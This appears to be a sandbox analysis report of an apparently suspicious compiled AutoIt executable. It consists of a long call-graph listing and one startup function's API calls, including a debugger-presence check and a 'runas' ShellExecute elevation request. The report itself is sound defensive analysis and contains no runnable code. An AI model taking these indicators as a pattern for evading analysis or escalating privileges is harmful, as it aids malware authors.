100726->100729 100727->100717 100729->100720 100730->100684 100731->100692 100732->100690 100733->100702 100734->100692 100735->100690 100736->100696 100737->100692 100738->100712 100739->100708 100741 a8d70e 100740->100741 100742 a8d723 100740->100742 100743 a88d34 __chsize_nolock 58 API calls 100741->100743 100745 a88d34 __chsize_nolock 58 API calls 100742->100745 100747 a8d748 100742->100747 100744 a8d713 100743->100744 100746 a88d68 __ftell_nolock 58 API calls 100744->100746 100748 a8d752 100745->100748 100750 a8d71b 100746->100750 100747->100718 100749 a88d68 __ftell_nolock 58 API calls 100748->100749 100751 a8d75a 100749->100751 100750->100718 100752 a88ff6 __ftell_nolock 9 API calls 100751->100752 100752->100750 100753->100722 100754->100725 100817 a91b90 100755->100817 100758 a648f7 100819 a67eec 100758->100819 100759 a648da 100760 a67d2c 59 API calls 100759->100760 100762 a648e6 100760->100762 100763 a67886 59 API calls 100762->100763 100764 a648f2 100763->100764 100765 a809d5 100764->100765 100766 a91b90 __ftell_nolock 100765->100766 100767 a809e2 GetLongPathNameW 100766->100767 100768 a67d2c 59 API calls 100767->100768 100769 a6741d 100768->100769 100770 a6716b 100769->100770 100771 a677c7 59 API calls 100770->100771 100772 a6717d 100771->100772 100773 a648ae 60 API calls 100772->100773 100774 a67188 100773->100774 100775 a67193 100774->100775 100778 a9ecae 100774->100778 100776 a63f84 59 API calls 100775->100776 100779 a6719f 100776->100779 100780 a9ecc8 100778->100780 100829 a67a68 61 API calls 100778->100829 100823 a634c2 100779->100823 100782 a671b2 Mailbox 100782->99750 100784 a64f3d 136 API calls 100783->100784 100785 a669ef 100784->100785 100786 a9e45a 100785->100786 100787 a64f3d 136 API calls 100785->100787 100788 ac97e5 122 API calls 100786->100788 100789 a66a03 100787->100789 100790 a9e46f 100788->100790 100789->100786 100791 a66a0b 100789->100791 100792 a9e490 100790->100792 100793 a9e473 100790->100793 100795 a66a17 100791->100795 100796 a9e47b 100791->100796 100794 a80ff6 Mailbox 59 API calls 100792->100794 100797 a64faa 84 API calls 100793->100797 100801 a9e4d5 Mailbox 100794->100801 100830 a66bec 100795->100830 100937 ac4534 90 API calls _wprintf 100796->100937 100797->100796 100800 a9e489 100800->100792 100803 a9e689 100801->100803 100807 a9e69a 100801->100807 100814 a67f41 59 API calls 100801->100814 100923 a6766f 100801->100923 100931 a674bd 100801->100931 100938 abfc4d 59 API calls 2 library calls 100801->100938 100939 abfb6e 61 API calls 2 library calls 100801->100939 100940 ac7621 59 API calls Mailbox 100801->100940 100804 a82f95 _free 58 API calls 100803->100804 100805 a9e691 100804->100805 100806 a64faa 84 API calls 100805->100806 100806->100807 100811 a82f95 _free 58 API calls 100807->100811 100813 a64faa 84 API calls 100807->100813 100941 abfcb1 89 API calls 4 library calls 100807->100941 100811->100807 100813->100807 100814->100801 100818 a648bb GetFullPathNameW 100817->100818 100818->100758 100818->100759 100820 a67f06 100819->100820 100822 a67ef9 100819->100822 100821 a80ff6 Mailbox 59 API calls 100820->100821 100821->100822 100822->100762 100824 a634d4 100823->100824 100828 a634f3 _memmove 100823->100828 100826 a80ff6 Mailbox 59 API calls 100824->100826 100825 a80ff6 Mailbox 59 API calls 100827 a6350a 100825->100827 100826->100828 100827->100782 100828->100825 100829->100778 100831 a66c15 100830->100831 100832 a9e847 100830->100832 100947 a65906 60 API calls Mailbox 100831->100947 101033 abfcb1 89 API calls 4 library calls 100832->101033 100835 a9e85a 101034 abfcb1 89 API calls 4 library calls 100835->101034 100836 a66c37 100948 a65956 100836->100948 100839 a66c54 100841 a677c7 59 API calls 100839->100841 100843 a66c60 100841->100843 100842 a9e876 100845 a66cc1 100842->100845 100961 a80b9b 60 API calls __ftell_nolock 100843->100961 100847 a9e889 100845->100847 100848 a66ccf 100845->100848 100846 a66c6c 100849 a677c7 59 API calls 100846->100849 100850 a65dcf CloseHandle 100847->100850 100851 a677c7 59 API calls 100848->100851 100853 a66c78 100849->100853 100854 a9e895 100850->100854 100852 a66cd8 100851->100852 100855 a677c7 59 API calls 100852->100855 100856 a648ae 60 API calls 100853->100856 100857 a64f3d 136 API calls 100854->100857 100858 a66ce1 100855->100858 100859 a66c86 100856->100859 100860 a9e8b1 100857->100860 100971 a646f9 100858->100971 100962 a659b0 ReadFile SetFilePointerEx 100859->100962 100861 a9e8da 100860->100861 100864 ac97e5 122 API calls 100860->100864 101035 abfcb1 89 API calls 4 library calls 100861->101035 100868 a9e8cd 100864->100868 100865 a66cf8 100867 a66cb2 100963 a65c4e 100867->100963 100872 a9e8d5 100868->100872 100873 a9e8f6 100868->100873 100870 a9e8f1 100901 a66e6c Mailbox 100870->100901 100875 a64faa 84 API calls 100872->100875 100876 a64faa 84 API calls 100873->100876 100875->100861 100877 a9e8fb 100876->100877 100878 a80ff6 Mailbox 59 API calls 100877->100878 100884 a9e92f 100878->100884 100882 a63bcd 100882->99617 100882->99640 100886 a6766f 59 API calls 100884->100886 100920 a9e978 Mailbox 100886->100920 100889 a9eb69 101040 ac7581 59 API calls Mailbox 100889->101040 100894 a9eb8b 101041 acf835 59 API calls 2 library calls 100894->101041 100897 a9eb98 100899 a82f95 _free 58 API calls 100897->100899 100899->100901 100942 a65934 100901->100942 100903 a6766f 59 API calls 100903->100920 100913 a67f41 59 API calls 100913->100920 100917 a9ebbb 101042 abfcb1 89 API calls 4 library calls 100917->101042 100919 a9ebd4 100921 a82f95 _free 58 API calls 100919->100921 100920->100889 100920->100903 100920->100913 100920->100917 101036 abfc4d 59 API calls 2 library calls 100920->101036 101037 abfb6e 61 API calls 2 library calls 100920->101037 101038 ac7621 59 API calls Mailbox 100920->101038 101039 a67373 59 API calls Mailbox 100920->101039 100922 a9ebe7 100921->100922 100922->100901 100924 a6770f 100923->100924 100928 a67682 _memmove 100923->100928 100926 a80ff6 Mailbox 59 API calls 100924->100926 100925 a80ff6 Mailbox 59 API calls 100927 a67689 100925->100927 100926->100928 100929 a80ff6 Mailbox 59 API calls 100927->100929 100930 a676b2 100927->100930 100928->100925 100929->100930 100930->100801 100932 a674d0 100931->100932 100935 a6757e 100931->100935 100933 a80ff6 Mailbox 59 API calls 100932->100933 100936 a67502 100932->100936 100933->100936 100934 a80ff6 59 API calls Mailbox 100934->100936 100935->100801 100936->100934 100936->100935 100937->100800 100938->100801 100939->100801 100940->100801 100941->100807 100943 a65dcf CloseHandle 100942->100943 100944 a6593c Mailbox 100943->100944 100945 a65dcf CloseHandle 100944->100945 100946 a6594b 100945->100946 100946->100882 100947->100836 100949 a65dcf CloseHandle 100948->100949 100950 a65962 100949->100950 101045 a65df9 100950->101045 100952 a65981 100953 a659a4 100952->100953 101053 a65770 100952->101053 100953->100835 100953->100839 100955 a65993 101070 a653db SetFilePointerEx SetFilePointerEx 100955->101070 100957 a6599a 100957->100953 100958 a9e030 100957->100958 101071 ac3696 SetFilePointerEx SetFilePointerEx WriteFile 100958->101071 100960 a9e060 100960->100953 100961->100846 100962->100867 100970 a65c68 100963->100970 100964 a65cef SetFilePointerEx 101084 a65dae SetFilePointerEx 100964->101084 100965 a9e151 101085 a65dae SetFilePointerEx 100965->101085 100968 a65cc3 100968->100845 100969 a9e16b 100970->100964 100970->100965 100970->100968 100972 a677c7 59 API calls 100971->100972 100973 a6470f 100972->100973 100974 a677c7 59 API calls 100973->100974 100975 a64717 100974->100975 100976 a677c7 59 API calls 100975->100976 100977 a6471f 100976->100977 100978 a677c7 59 API calls 100977->100978 100979 a64727 100978->100979 100980 a9d8fb 100979->100980 100981 a6475b 100979->100981 100982 a681a7 59 API calls 100980->100982 100983 a679ab 59 API calls 100981->100983 100984 a9d904 100982->100984 100985 a64769 100983->100985 100986 a67eec 59 API calls 100984->100986 100987 a67e8c 59 API calls 100985->100987 100989 a6479e 100986->100989 100988 a64773 100987->100988 100988->100989 100990 a679ab 59 API calls 100988->100990 100991 a647de 100989->100991 100993 a647bd 100989->100993 101004 a9d924 100989->101004 100994 a64794 100990->100994 101086 a679ab 100991->101086 100998 a67b52 59 API calls 100993->100998 100997 a67e8c 59 API calls 100994->100997 100995 a647ef 100999 a64801 100995->100999 101002 a681a7 59 API calls 100995->101002 100996 a9d9f4 101000 a67d2c 59 API calls 100996->101000 100997->100989 101001 a647c7 100998->101001 101003 a64811 100999->101003 101005 a681a7 59 API calls 100999->101005 101017 a9d9b1 101000->101017 101001->100991 101008 a679ab 59 API calls 101001->101008 101002->100999 101007 a64818 101003->101007 101009 a681a7 59 API calls 101003->101009 101004->100996 101006 a9d9dd 101004->101006 101016 a9d95b 101004->101016 101005->101003 101006->100996 101012 a9d9c8 101006->101012 101010 a681a7 59 API calls 101007->101010 101019 a6481f Mailbox 101007->101019 101008->100991 101009->101007 101010->101019 101011 a67b52 59 API calls 101011->101017 101014 a67d2c 59 API calls 101012->101014 101013 a9d9b9 101015 a67d2c 59 API calls 101013->101015 101014->101017 101015->101017 101016->101013 101020 a9d9a4 101016->101020 101017->100991 101017->101011 101099 a67a84 59 API calls 2 library calls 101017->101099 101019->100865 101021 a67d2c 59 API calls 101020->101021 101021->101017 101033->100835 101034->100842 101035->100870 101036->100920 101037->100920 101038->100920 101039->100920 101040->100894 101041->100897 101042->100919 101046 a65e12 CreateFileW 101045->101046 101047 a9e181 101045->101047 101049 a65e34 101046->101049 101048 a9e187 CreateFileW 101047->101048 101047->101049 101048->101049 101050 a9e1ad 101048->101050 101049->100952 101051 a65c4e 2 API calls 101050->101051 101052 a9e1b8 101051->101052 101052->101049 101054 a9dfce 101053->101054 101055 a6578b 101053->101055 101069 a6581a 101054->101069 101078 a65e3f 101054->101078 101056 a65c4e 2 API calls 101055->101056 101055->101069 101057 a657ad 101056->101057 101058 a6538e 59 API calls 101057->101058 101060 a657b7 101058->101060 101060->101054 101061 a657c4 101060->101061 101062 a80ff6 Mailbox 59 API calls 101061->101062 101063 a657cf 101062->101063 101064 a6538e 59 API calls 101063->101064 101065 a657da 101064->101065 101072 a65d20 101065->101072 101067 a65807 101068 a65c4e 2 API calls 101067->101068 101068->101069 101069->100955 101070->100957 101071->100960 101073 a65d93 101072->101073 101077 a65d2e 101072->101077 101083 a65dae SetFilePointerEx 101073->101083 101074 a65d56 101074->101067 101076 a65d66 ReadFile 101076->101074 101076->101077 101077->101074 101077->101076 101079 a65c4e 2 API calls 101078->101079 101080 a65e60 101079->101080 101081 a65c4e 2 API calls 101080->101081 101082 a65e74 101081->101082 101082->101069 101083->101077 101084->100968 101085->100969 101087 a67a17 101086->101087 101088 a679ba 101086->101088 101089 a67e8c 59 API calls 101087->101089 101088->101087 101090 a679c5 101088->101090 101096 a679e8 _memmove 101089->101096 101091 a679e0 101090->101091 101092 a9ef32 101090->101092 101100 a68087 59 API calls Mailbox 101091->101100 101093 a68189 59 API calls 101092->101093 101095 a9ef3c 101093->101095 101097 a80ff6 Mailbox 59 API calls 101095->101097 101096->100995 101098 a9ef5c 101097->101098 101099->101017 101100->101096 101102 a66ef5 101101->101102 101107 a67009 101101->101107 101103 a80ff6 Mailbox 59 API calls 101102->101103 101102->101107 101104 a66f1c 101103->101104 101105 a80ff6 Mailbox 59 API calls 101104->101105 101111 a66f91 101105->101111 101107->99756 101109 a674bd 59 API calls 101109->101111 101110 a6766f 59 API calls 101110->101111 101111->101107 101111->101109 101111->101110 101114 a663a0 101111->101114 101139 ab6ac9 59 API calls Mailbox 101111->101139 101112->99758 101113->99760 101115 a67b76 59 API calls 101114->101115 101130 a663c5 101115->101130 101116 a665ca 101121 a9e41f 101124 a6766f 59 API calls 101124->101130 101127 a67eec 59 API calls 101127->101130 101130->101116 101130->101121 101130->101124 101130->101127 101131 a668f9 _memmove 101130->101131 101132 a9e3bb 101130->101132 101135 a67faf 59 API calls 101130->101135 101140 a660cc 60 API calls 101130->101140 101139->101111 101140->101130 101147->99775 101640 a6107d 101645 a671eb 101640->101645 101642 a6108c 101643 a82f80 __cinit 67 API calls 101642->101643 101644 a61096 101643->101644 101646 a671fb __ftell_nolock 101645->101646 101647 a677c7 59 API calls 101646->101647 101648 a672b1 101647->101648 101649 a64864 61 API calls 101648->101649 101650 a672ba 101649->101650 101676 a8074f 101650->101676 101653 a67e0b 59 API calls 101654 a672d3 101653->101654 101655 a63f84 59 API calls 101654->101655 101656 a672e2 101655->101656 101657 a677c7 59 API calls 101656->101657 101658 a672eb 101657->101658 101659 a67eec 59 API calls 101658->101659 101660 a672f4 RegOpenKeyExW 101659->101660 101661 a9ecda RegQueryValueExW 101660->101661 101666 a67316 Mailbox 101660->101666 101662 a9ed6c RegCloseKey 101661->101662 101663 a9ecf7 101661->101663 101662->101666 101675 a9ed7e _wcscat Mailbox __NMSG_WRITE 101662->101675 101664 a80ff6 Mailbox 59 API calls 101663->101664 101665 a9ed10 101664->101665 101668 a6538e 59 API calls 101665->101668 101666->101642 101667 a67b52 59 API calls 101667->101675 101669 a9ed1b RegQueryValueExW 101668->101669 101670 a9ed38 101669->101670 101672 a9ed52 101669->101672 101671 a67d2c 59 API calls 101670->101671 101671->101672 101672->101662 101673 a67f41 59 API calls 101673->101675 101674 a63f84 59 API calls 101674->101675 101675->101666 101675->101667 101675->101673 101675->101674 101677 a91b90 __ftell_nolock 101676->101677 101678 a8075c GetFullPathNameW 101677->101678 101679 a8077e 101678->101679 101680 a67d2c 59 API calls 101679->101680 101681 a672c5 101680->101681 101681->101653 101682 a6568a 101689 a65c18 101682->101689 101687 a656ba Mailbox 101690 a80ff6 Mailbox 59 API calls 101689->101690 101691 a65c2b 101690->101691 101692 a80ff6 Mailbox 59 API calls 101691->101692 101693 a6569c 101692->101693 101694 a65632 101693->101694 101701 a65a2f 101694->101701 101696 a65d20 2 API calls 101698 a65643 101696->101698 101697 a65674 101697->101687 101700 a681c1 61 API calls Mailbox 101697->101700 101698->101696 101698->101697 101708 a65bda 101698->101708 101700->101687 101702 a65a40 101701->101702 101703 a9e065 101701->101703 101702->101698 101717 ab6443 59 API calls Mailbox 101703->101717 101705 a9e06f 101706 a80ff6 Mailbox 59 API calls 101705->101706 101707 a9e07b 101706->101707 101709 a65bee 101708->101709 101710 a9e117 101708->101710 101718 a65b19 101709->101718 101723 ab6443 59 API calls Mailbox 101710->101723 101713 a65bfa 101713->101698 101714 a9e122 101715 a80ff6 Mailbox 59 API calls 101714->101715 101716 a9e137 _memmove 101715->101716 101717->101705 101719 a65b31 101718->101719 101721 a65b2a _memmove 101718->101721 101720 a80ff6 Mailbox 59 API calls 101719->101720 101722 a9e0a7 101719->101722 101720->101721 101721->101713 101722->101722 101723->101714 101724 aa0226 101730 a6ade2 Mailbox 101724->101730 101726 aa0c86 101840 ab66f4 101726->101840 101728 aa0c8f 101730->101726 101730->101728 101731 aa00e0 VariantClear 101730->101731 101732 a6b6c1 101730->101732 101738 a72123 101730->101738 101778 ad474d 101730->101778 101787 ade237 101730->101787 101790 acd2e6 101730->101790 101837 a69df0 59 API calls Mailbox 101730->101837 101838 ab7405 59 API calls 101730->101838 101731->101730 101839 aca0b5 89 API calls 4 library calls 101732->101839 101843 a69bf8 101738->101843 101741 a80ff6 Mailbox 59 API calls 101743 a72154 101741->101743 101746 a72164 101743->101746 101871 a65906 60 API calls Mailbox 101743->101871 101744 aa69af 101745 a72189 101744->101745 101875 acf7df 59 API calls 101744->101875 101753 a72196 101745->101753 101876 a69c9c 59 API calls 101745->101876 101748 a69997 84 API calls 101746->101748 101750 a72172 101748->101750 101752 a65956 67 API calls 101750->101752 101751 aa69f7 101751->101753 101754 aa69ff 101751->101754 101755 a72181 101752->101755 101757 a65e3f 2 API calls 101753->101757 101877 a69c9c 59 API calls 101754->101877 101755->101744 101755->101745 101874 a65a1a CloseHandle 101755->101874 101759 a7219d 101757->101759 101760 a721b7 101759->101760 101761 aa6a11 101759->101761 101762 a677c7 59 API calls 101760->101762 101763 a80ff6 Mailbox 59 API calls 101761->101763 101764 a721bf 101762->101764 101765 aa6a17 101763->101765 101856 a656d2 101764->101856 101767 aa6a2b 101765->101767 101878 a659b0 ReadFile SetFilePointerEx 101765->101878 101773 aa6a2f _memmove 101767->101773 101879 ac794e 59 API calls 2 library calls 101767->101879 101769 a721ce 101769->101773 101872 a69b9c 59 API calls Mailbox 101769->101872 101772 a721e2 Mailbox 101774 a7221c 101772->101774 101775 a65dcf CloseHandle 101772->101775 101774->101730 101776 a72210 101775->101776 101776->101774 101873 a65a1a CloseHandle 101776->101873 101779 a69997 84 API calls 101778->101779 101780 ad4787 101779->101780 101781 a663a0 94 API calls 101780->101781 101782 ad4797 101781->101782 101783 ad47bc 101782->101783 101784 a6a000 341 API calls 101782->101784 101785 a69bf8 59 API calls 101783->101785 101786 ad47c0 101783->101786 101784->101783 101785->101786 101786->101730 101788 adcdf1 130 API calls 101787->101788 101789 ade247 101788->101789 101789->101730 101791 acd305 101790->101791 101792 acd310 101790->101792 101883 a69c9c 59 API calls 101791->101883 101795 a677c7 59 API calls 101792->101795 101835 acd3ea Mailbox 101792->101835 101794 a80ff6 Mailbox 59 API calls 101796 acd433 101794->101796 101797 acd334 101795->101797 101798 acd43f 101796->101798 101886 a65906 60 API calls Mailbox 101796->101886 101800 a677c7 59 API calls 101797->101800 101801 a69997 84 API calls 101798->101801 101802 acd33d 101800->101802 101803 acd457 101801->101803 101804 a69997 84 API calls 101802->101804 101805 a65956 67 API calls 101803->101805 101806 acd349 101804->101806 101807 acd466 101805->101807 101808 a646f9 59 API calls 101806->101808 101809 acd49e 101807->101809 101810 acd46a GetLastError 101807->101810 101811 acd35e 101808->101811 101814 acd4c9 101809->101814 101815 acd500 101809->101815 101812 acd483 101810->101812 101813 a67c8e 59 API calls 101811->101813 101834 acd3f3 Mailbox 101812->101834 101887 a65a1a CloseHandle 101812->101887 101816 acd391 101813->101816 101818 a80ff6 Mailbox 59 API calls 101814->101818 101817 a80ff6 Mailbox 59 API calls 101815->101817 101819 acd3e3 101816->101819 101824 ac3e73 3 API calls 101816->101824 101820 acd505 101817->101820 101821 acd4ce 101818->101821 101885 a69c9c 59 API calls 101819->101885 101828 a677c7 59 API calls 101820->101828 101820->101834 101825 acd4df 101821->101825 101829 a677c7 59 API calls 101821->101829 101826 acd3a1 101824->101826 101888 acf835 59 API calls 2 library calls 101825->101888 101826->101819 101827 acd3a5 101826->101827 101830 a67f41 59 API calls 101827->101830 101828->101834 101829->101825 101832 acd3b2 101830->101832 101884 ac3c66 63 API calls Mailbox 101832->101884 101834->101730 101835->101794 101835->101834 101836 acd3bb Mailbox 101836->101819 101837->101730 101838->101730 101839->101726 101889 ab6636 101840->101889 101842 ab6702 101842->101728 101844 a9fbff 101843->101844 101845 a69c08 101843->101845 101846 a9fc10 101844->101846 101847 a67d2c 59 API calls 101844->101847 101849 a80ff6 Mailbox 59 API calls 101845->101849 101848 a67eec 59 API calls 101846->101848 101847->101846 101851 a9fc1a 101848->101851 101850 a69c1b 101849->101850 101850->101851 101852 a69c26 101850->101852 101853 a69c34 101851->101853 101854 a677c7 59 API calls 101851->101854 101852->101853 101855 a67f41 59 API calls 101852->101855 101853->101741 101853->101744 101854->101853 101855->101853 101857 a65702 101856->101857 101858 a656dd 101856->101858 101859 a67eec 59 API calls 101857->101859 101858->101857 101861 a656ec 101858->101861 101866 ac349a 101859->101866 101862 a65c18 59 API calls 101861->101862 101865 ac35ba 101862->101865 101864 ac34c9 101864->101769 101867 a65632 61 API calls 101865->101867 101866->101864 101880 ac3436 ReadFile SetFilePointerEx 101866->101880 101881 a67a84 59 API calls 2 library calls 101866->101881 101868 ac35c8 101867->101868 101870 ac35d8 Mailbox 101868->101870 101882 a6793a 61 API calls Mailbox 101868->101882 101870->101769 101871->101746 101872->101772 101873->101774 101874->101744 101875->101744 101876->101751 101877->101759 101878->101767 101879->101773 101880->101866 101881->101866 101882->101870 101883->101792 101884->101836 101885->101835 101886->101798 101887->101834 101888->101834 101890 ab665e 101889->101890 101891 ab6641 101889->101891 101890->101842 101891->101890 101893 ab6621 59 API calls Mailbox 101891->101893 101893->101891 101894 a6e70b 101897 a6d260 101894->101897 101896 a6e719 101898 a6d27d 101897->101898 101926 a6d4dd 101897->101926 101899 aa2b0a 101898->101899 101900 aa2abb 101898->101900 101929 a6d2a4 101898->101929 101941 ada6fb 341 API calls __cinit 101899->101941 101902 aa2abe 101900->101902 101910 aa2ad9 101900->101910 101904 aa2aca 101902->101904 101902->101929 101939 adad0f 341 API calls 101904->101939 101905 a82f80 __cinit 67 API calls 101905->101929 101908 aa2cdf 101908->101908 101909 a6d6ab 101909->101896 101910->101926 101940 adb1b7 341 API calls 3 library calls 101910->101940 101911 a6d594 101933 a68bb2 68 API calls 101911->101933 101915 aa2c26 101945 adaa66 89 API calls 101915->101945 101916 a6d5a3 101916->101896 101919 a68620 69 API calls 101919->101929 101926->101909 101946 aca0b5 89 API calls 4 library calls 101926->101946 101927 a6a000 341 API calls 101927->101929 101928 a681a7 59 API calls 101928->101929 101929->101905 101929->101909 101929->101911 101929->101915 101929->101919 101929->101926 101929->101927 101929->101928 101931 a688a0 68 API calls __cinit 101929->101931 101932 a686a2 68 API calls 101929->101932 101934 a6859a 68 API calls 101929->101934 101935 a6d0dc 341 API calls 101929->101935 101936 a69f3a 59 API calls Mailbox 101929->101936 101937 a6d060 89 API calls 101929->101937 101938 a6cedd 341 API calls 101929->101938 101942 a68bb2 68 API calls 101929->101942 101943 a69e9c 60 API calls Mailbox 101929->101943 101944 ab6d03 60 API calls 101929->101944 101931->101929 101932->101929 101933->101916 101934->101929 101935->101929 101936->101929 101937->101929 101938->101929 101939->101909 101940->101926 101941->101929 101942->101929 101943->101929 101944->101929 101945->101926 101946->101908 101947 a9ff06 101948 a9ff10 101947->101948 101981 a6ac90 Mailbox _memmove 101947->101981 102046 a68e34 59 API calls Mailbox 101948->102046 101953 a80ff6 59 API calls Mailbox 101973 a6a097 Mailbox 101953->101973 101956 a6b5d5 101958 a681a7 59 API calls 101956->101958 101969 a6a1b7 101958->101969 101959 aa047f 102050 aca0b5 89 API calls 4 library calls 101959->102050 101960 a6b5da 102056 aca0b5 89 API calls 4 library calls 101960->102056 101962 a67f41 59 API calls 101962->101981 101963 a677c7 59 API calls 101963->101973 101965 a681a7 59 API calls 101965->101973 101966 ab7405 59 API calls 101966->101973 101967 aa048e 101968 a82f80 67 API calls __cinit 101968->101973 101971 ab66f4 Mailbox 59 API calls 101971->101969 101972 aa0e00 102055 aca0b5 89 API calls 4 library calls 101972->102055 101973->101953 101973->101956 101973->101959 101973->101960 101973->101963 101973->101965 101973->101966 101973->101968 101973->101969 101973->101972 101976 a6a6ba 101973->101976 102040 a6ca20 341 API calls 2 library calls 101973->102040 102041 a6ba60 60 API calls Mailbox 101973->102041 101975 adbf80 341 API calls 101975->101981 102054 aca0b5 89 API calls 4 library calls 101976->102054 101977 ab66f4 Mailbox 59 API calls 101977->101981 101978 a6b416 102045 a6f803 341 API calls 101978->102045 101979 a6a000 341 API calls 101979->101981 101981->101962 101981->101969 101981->101973 101981->101975 101981->101977 101981->101978 101981->101979 101982 aa0c94 101981->101982 101984 aa0ca2 101981->101984 101987 a6b37c 101981->101987 101988 a80ff6 59 API calls Mailbox 101981->101988 101993 a6b685 101981->101993 101996 a6ade2 Mailbox 101981->101996 102002 adc5f4 101981->102002 102034 ac7be0 101981->102034 102047 ab7405 59 API calls 101981->102047 102048 adc4a7 85 API calls 2 library calls 101981->102048 102052 a69df0 59 API calls Mailbox 101982->102052 102053 aca0b5 89 API calls 4 library calls 101984->102053 101986 aa0c86 101986->101969 101986->101971 102043 a69e9c 60 API calls Mailbox 101987->102043 101988->101981 101990 a6b38d 102044 a69e9c 60 API calls Mailbox 101990->102044 102051 aca0b5 89 API calls 4 library calls 101993->102051 101996->101969 101996->101986 101996->101993 101997 aa00e0 VariantClear 101996->101997 101998 ad474d 341 API calls 101996->101998 101999 a72123 95 API calls 101996->101999 102000 acd2e6 101 API calls 101996->102000 102001 ade237 130 API calls 101996->102001 102042 a69df0 59 API calls Mailbox 101996->102042 102049 ab7405 59 API calls 101996->102049 101997->101996 101998->101996 101999->101996 102000->101996 102001->101996 102003 a677c7 59 API calls 102002->102003 102004 adc608 102003->102004 102005 a677c7 59 API calls 102004->102005 102006 adc610 102005->102006 102007 a677c7 59 API calls 102006->102007 102008 adc618 102007->102008 102009 a69997 84 API calls 102008->102009 102033 adc626 102009->102033 102010 a67d2c 59 API calls 102010->102033 102011 adc80f 102012 adc83c Mailbox 102011->102012 102058 a69b9c 59 API calls Mailbox 102011->102058 102012->101981 102013 adc7f6 102017 a67e0b 59 API calls 102013->102017 102015 adc811 102019 a67e0b 59 API calls 102015->102019 102016 a681a7 59 API calls 102016->102033 102020 adc803 102017->102020 102018 a67a84 59 API calls 102018->102033 102022 adc820 102019->102022 102021 a67c8e 59 API calls 102020->102021 102021->102011 102024 a67c8e 59 API calls 102022->102024 102023 a67faf 59 API calls 102026 adc6bd CharUpperBuffW 102023->102026 102024->102011 102025 a67faf 59 API calls 102027 adc77d CharUpperBuffW 102025->102027 102057 a6859a 68 API calls 102026->102057 102029 a6c707 69 API calls 102027->102029 102029->102033 102030 a69997 84 API calls 102030->102033 102031 a67e0b 59 API calls 102031->102033 102032 a67c8e 59 API calls 102032->102033 102033->102010 102033->102011 102033->102012 102033->102013 102033->102015 102033->102016 102033->102018 102033->102023 102033->102025 102033->102030 102033->102031 102033->102032 102035 ac7bec 102034->102035 102036 a80ff6 Mailbox 59 API calls 102035->102036 102037 ac7bfa 102036->102037 102038 ac7c08 102037->102038 102039 a677c7 59 API calls 102037->102039 102038->101981 102039->102038 102040->101973 102041->101973 102042->101996 102043->101990 102044->101978 102045->101993 102046->101981 102047->101981 102048->101981 102049->101996 102050->101967 102051->101986 102052->101986 102053->101986 102054->101969 102055->101960 102056->101969 102057->102033 102058->102012

                                                      Executed Functions

                                                      Function 00A63B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A63B7A
                                                      • IsDebuggerPresent.KERNEL32 ref: 00A63B8C
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00B262F8,00B262E0,?,?), ref: 00A63BFD
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                        • Part of subcall function 00A70A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A63C26,00B262F8,?,?,?), ref: 00A70ACE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A63C81
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B193F0,00000010), ref: 00A9D4BC
                                                      • SetCurrentDirectoryW.KERNEL32(?,00B262F8,?,?,?), ref: 00A9D4F4
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B15D40,00B262F8,?,?,?), ref: 00A9D57A
                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A9D581
                                                        • Part of subcall function 00A63A58: GetSysColorBrush.USER32(0000000F), ref: 00A63A62
                                                        • Part of subcall function 00A63A58: LoadCursorW.USER32(00000000,00007F00), ref: 00A63A71
                                                        • Part of subcall function 00A63A58: LoadIconW.USER32(00000063), ref: 00A63A88
                                                        • Part of subcall function 00A63A58: LoadIconW.USER32(000000A4), ref: 00A63A9A
                                                        • Part of subcall function 00A63A58: LoadIconW.USER32(000000A2), ref: 00A63AAC
                                                        • Part of subcall function 00A63A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A63AD2
                                                        • Part of subcall function 00A63A58: RegisterClassExW.USER32(?), ref: 00A63B28
                                                        • Part of subcall function 00A639E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A63A15
                                                        • Part of subcall function 00A639E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A63A36
                                                        • Part of subcall function 00A639E7: ShowWindow.USER32(00000000,?,?), ref: 00A63A4A
                                                        • Part of subcall function 00A639E7: ShowWindow.USER32(00000000,?,?), ref: 00A63A53
                                                        • Part of subcall function 00A643DB: _memset.LIBCMT ref: 00A64401
                                                        • Part of subcall function 00A643DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A644A6
                                                      Strings
                                                      • This is a third-party compiled AutoIt script., xrefs: 00A9D4B4
                                                      • runas, xrefs: 00A9D575
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                      • API String ID: 529118366-3287110873
                                                      • Opcode ID: dd8e27389eff7514fc7523ddd3e8a2baf53d62349d109cdff653703828923832
